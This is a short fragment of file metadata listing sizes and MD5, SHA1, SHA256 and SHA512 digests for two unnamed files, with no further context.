SHA256: 72f7dbc5502cfce6de9184df4466a84fbbaa828048a183b0eb1690e79c886903
SHA512: 33ff33582f75a67602233860d3057122a4f893d3ec3b58204617660ec46d1afd25657047f364c06f727e1604907e9cb740dc847b992249d0656100308c4bedde

Filesize: 25KB
MD5: 40d7eca32b2f4d29db98715dd45bfac5
SHA1: 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256: 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512: 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

Filesize: 735B
MD5: f79d850a439815f276773a85f654511d
SHA1: 42c4b202b7122ce48bb17975cf0a5be337d09fec
SHA256: 31b4234965ffbff8d8a2d9dc8876d2edb1ba4eb44f482fedad5ed16284f872ff
SHA512: 5ea67fac41596652b0eeaf1f8d4e01fb6d2f2495c7e7185c22e7cac5187d3fc5d02e1649710c0ef30419c6b2805c4d947cf39eab5f31d8f0b72cf3e37e3a507c